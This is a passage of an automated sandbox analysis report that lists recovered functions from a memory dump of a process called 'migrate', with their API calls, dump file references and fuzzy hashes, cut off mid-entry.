                                                                                                                                                                                                    Function 00111A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 6340e25cc475333cba1a70fd3cf7ffce87dc56f487c8683e7696e1e19cf66796
                                                                                                                                                                                                    • Instruction ID: 73d1a0af566df7506b1f56e5c86c9523ff53a9418eb425efb469ea6bdd341099
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6340e25cc475333cba1a70fd3cf7ffce87dc56f487c8683e7696e1e19cf66796
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EC1A370A04254BFEF1DCF68D488BE9BBA5AF15310F0801B9EE559B396DB3099C4CB61
                                                                                                                                                                                                    Function 001163E2 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                                                                                    • Opcode ID: fb233ce7a5aff4237f521626d1ef48721b765c343b9cdda43a55cb90ced64ce7
                                                                                                                                                                                                    • Instruction ID: a757ef33e137d69880214eb0955a2ea52e612230ab7aa4c8c7e07d4c7bea3505
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb233ce7a5aff4237f521626d1ef48721b765c343b9cdda43a55cb90ced64ce7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3651C776504304ABC765DA60DC45FDBB3EDEB99300F04093DF949D7142EB35A549C762
                                                                                                                                                                                                    Function 00113BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 62de6463fe1f238344ba438a5f92310107512cdf2b5a35281f3911f79ba18dd7
                                                                                                                                                                                                    • Instruction ID: 6180aa1f70aaadc7dae8b814f11ba05f48241ad0078e10f25ed4a3a19c399250
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62de6463fe1f238344ba438a5f92310107512cdf2b5a35281f3911f79ba18dd7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2471AF71501B859EDB29DB70C855AE7B7E9AB24301F40093EF6BA87241EB3266D8CF11
                                                                                                                                                                                                    Function 00118284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00118289
                                                                                                                                                                                                      • Part of subcall function 001113DC: __EH_prolog.LIBCMT ref: 001113E1
                                                                                                                                                                                                      • Part of subcall function 0011A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0011A598
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2506663941-0
                                                                                                                                                                                                    • Opcode ID: ba40dd7f4180cc0a96f8660d73c7eb8b0a0254274597019fce4351fef2207bb1
                                                                                                                                                                                                    • Instruction ID: 50d038cdddebaa54a7b8264fc93829d2e9bb2fd00add4ef241d55c1e900dd256
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba40dd7f4180cc0a96f8660d73c7eb8b0a0254274597019fce4351fef2207bb1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC41E871954658AADB28DBA0CC55BEAB3B8BF10300F4444FAE19A67083EF715EC9CB50
                                                                                                                                                                                                    Function 001113E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 001113E1
                                                                                                                                                                                                      • Part of subcall function 00115E37: __EH_prolog.LIBCMT ref: 00115E3C
                                                                                                                                                                                                      • Part of subcall function 0011CE40: __EH_prolog.LIBCMT ref: 0011CE45
                                                                                                                                                                                                      • Part of subcall function 0011B505: __EH_prolog.LIBCMT ref: 0011B50A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: c089f13e09b1e479bcc92e8d5f9d5ff760c6dd385233836768cb44d2a5a63b4e
                                                                                                                                                                                                    • Instruction ID: 14f8d6a06e98fef2281aa72d1668c10fef11c517cada04c7767bf4339fa57664
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c089f13e09b1e479bcc92e8d5f9d5ff760c6dd385233836768cb44d2a5a63b4e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1413DB0905B409EE728DF798885AE6FBE5BF29300F50493ED5FE83282C7316654CB10
                                                                                                                                                                                                    Function 001113DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 001113E1
                                                                                                                                                                                                      • Part of subcall function 00115E37: __EH_prolog.LIBCMT ref: 00115E3C
                                                                                                                                                                                                      • Part of subcall function 0011CE40: __EH_prolog.LIBCMT ref: 0011CE45
                                                                                                                                                                                                      • Part of subcall function 0011B505: __EH_prolog.LIBCMT ref: 0011B50A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 4a24e7a9efd8809c6bd62a9d7b0557fa0668860ca3f1be596a995a1af7bab5bf
                                                                                                                                                                                                    • Instruction ID: 2627b9440dd5288a95c2eac557f7abe39d1985f3f1a2f3d9c9e093571c6be76c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a24e7a9efd8809c6bd62a9d7b0557fa0668860ca3f1be596a995a1af7bab5bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06413BB0905B409EE724DF798885AE6FBE5BF29300F50493ED5FE83282CB316694CB10
                                                                                                                                                                                                    Function 0012359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 8fb69434288544d6c6cfacabb1938b724d787bdef473e5f2aa7716247f1b000c
                                                                                                                                                                                                    • Instruction ID: a0d507b8b7a57e3fa189e33dd09fa93492c6dec79f812b636bb6d0116b7eb9a1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fb69434288544d6c6cfacabb1938b724d787bdef473e5f2aa7716247f1b000c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D521F8B1E40221AFDB149F74EC4166B76ACFB14714F14063AE516EB681D7749A20C7E8
                                                                                                                                                                                                    Function 0012B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0012B098
                                                                                                                                                                                                      • Part of subcall function 001113DC: __EH_prolog.LIBCMT ref: 001113E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: c4b6bbb933a6e6d4a5aeea1d03e54eed5a7e0790137a514c97028c8936f9d95c
                                                                                                                                                                                                    • Instruction ID: f64e2437fdc5243df6eed7201da7b98fb5ce6397e7b9978041a6240b7650409c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4b6bbb933a6e6d4a5aeea1d03e54eed5a7e0790137a514c97028c8936f9d95c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D531AD71C04259EECF19DFA4E891AEEBBB4AF18300F1044AEE409B3242D735AE54CB61
                                                                                                                                                                                                    Function 0013AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0013ACF8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                    • Opcode ID: acf3a9d2f1493d9003c54f369974cb037b4edd453586b807e8794bbf52bbb5b7
                                                                                                                                                                                                    • Instruction ID: b672b09ccd328f0d695f53fd13f58fbc12f2dca0018e45359d78cbe9f7d49971
                                                                                                                                                                                                    • Opcode Fuzzy Hash: acf3a9d2f1493d9003c54f369974cb037b4edd453586b807e8794bbf52bbb5b7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8113637A002255FDF269E68EC4089A7395AFC5331F564220FC95EB654D730EC4187D2
                                                                                                                                                                                                    Function 00119215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: e540f31933036c9ea0f90d4ceb239c816d7532ad58b5943e9e339287492212f7
                                                                                                                                                                                                    • Instruction ID: 553126206b4139b12151daf2e007aee483cca8af866eea55c699344806ff2d73
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e540f31933036c9ea0f90d4ceb239c816d7532ad58b5943e9e339287492212f7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E801A533900529BBCF19ABA8CC919DEB772BF98750F014135F822B7252DB348D81C6A0
                                                                                                                                                                                                    Function 00133C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00133C3F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                    • Opcode ID: 36c1152be9f92bb6ab34067e76b3a556fe4b53d508d20777d231617ec0ef3210
                                                                                                                                                                                                    • Instruction ID: d12db6b840400441bee9f892fbe5fc6f06171fbe67a97ec9be2638b0511cc130
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36c1152be9f92bb6ab34067e76b3a556fe4b53d508d20777d231617ec0ef3210
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1F0E536200216DFDF169EA9EC0099A77A9EF05B20B145226FA25E71D0DB31DA60C794
                                                                                                                                                                                                    Function 00138E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: 57aecad35bf72d1b795d09408a49563549cb8d6e53a0d4cd76c0650563cebe13
                                                                                                                                                                                                    • Instruction ID: c1eca876c521bc061f58f9d614659ffd1a0d9993a9664c91d74b7ebc864458cd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57aecad35bf72d1b795d09408a49563549cb8d6e53a0d4cd76c0650563cebe13
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBE06D326063259BEA7137699C05B9B76889B527B4F160131FC58A7091DFA0CE4182E1
                                                                                                                                                                                                    Function 00115ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00115AC2
                                                                                                                                                                                                      • Part of subcall function 0011B505: __EH_prolog.LIBCMT ref: 0011B50A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 81718d43d448af376dd100f0bc2761b61545a6db29a85a4f9290c7aa6c73f574
                                                                                                                                                                                                    • Instruction ID: 9d3c84983ce2bc2086c326397e63996d595f5508baec13f53b4ae7a86713a1e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81718d43d448af376dd100f0bc2761b61545a6db29a85a4f9290c7aa6c73f574
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01AF308107A0DAD72AEBB8D0417EDFBE4DF78704F54858DA45663283CBB41B18D7A2
                                                                                                                                                                                                    Function 0011F3FA Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                    • Opcode ID: c030b420006b7fb8cd711a3fcb7cdd046e7e86eb58b47ecc1591b8f626aaaa98
                                                                                                                                                                                                    • Instruction ID: c2fec2b53754cb0b49a92b5ad07d96c94a4cb7f18660e463b7f966c9fbd58cfb
